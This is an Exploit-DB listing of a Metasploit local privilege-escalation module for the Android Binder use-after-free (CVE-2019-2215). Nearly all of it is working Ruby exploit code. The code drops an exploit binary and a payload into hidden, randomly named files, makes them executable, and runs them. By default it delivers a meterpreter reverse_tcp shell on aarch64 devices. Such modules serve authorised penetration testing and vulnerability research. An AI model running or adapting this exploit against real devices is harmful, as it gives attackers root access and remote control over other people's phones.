Android Binder - Use-After-Free (Metasploit)

EDB-ID:

48129


Author:

Metasploit

Type:

local


Platform:

Android

Date:

2020-02-24


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super( update_info( info, {
        'Name'          => "Android Binder Use-After-Free Exploit",
        'Description'   => %q{
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Jann Horn',    # discovery and exploit
            'Maddie Stone', # discovery and exploit
            'grant-h',      # Qu1ckR00t
            'timwr',        # metasploit module
        ],
        'References'    => [
            [ 'CVE', '2019-2215' ],
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
        ],
        'DisclosureDate' => "Sep 26 2019",
        'SessionTypes'   => [ 'meterpreter' ],
        'Platform'       => [ "android", "linux" ],
        'Arch'           => [ ARCH_AARCH64 ],
        'Targets'        => [[ 'Auto', {} ]],
        'DefaultOptions' =>
        {
          'PAYLOAD'      => 'linux/aarch64/meterpreter/reverse_tcp',
          'WfsDelay'     => 5,
        },
        'DefaultTarget' => 0,
      }
    ))
  end

  def upload_and_chmodx(path, data)
    write_file path, data
    chmod(path)
    register_file_for_cleanup(path)
  end

  def exploit
    local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit" )
    exploit_data = File.read(local_file, {:mode => 'rb'})

    workingdir = session.fs.dir.getwd
    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(exploit_file, exploit_data)
    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(payload_file, generate_payload_exe)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end